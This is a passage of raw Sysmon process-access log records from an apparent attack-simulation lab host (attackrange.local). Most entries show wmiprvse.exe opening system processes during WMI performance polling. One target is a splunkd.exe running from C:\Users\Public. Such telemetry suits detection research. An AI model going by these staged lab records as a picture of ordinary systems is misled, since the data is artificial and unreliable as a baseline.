m\WmiPerfClass.dll+eaa6 10341000x8000000000000000150902Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.497{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150901Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.497{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150900Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.497{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150899Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.496{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150898Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.496{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150897Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.496{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150896Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.496{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150895Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.496{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150894Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.496{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150893Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150892Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150891Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150890Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150889Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150888Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150887Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.495{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150886Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 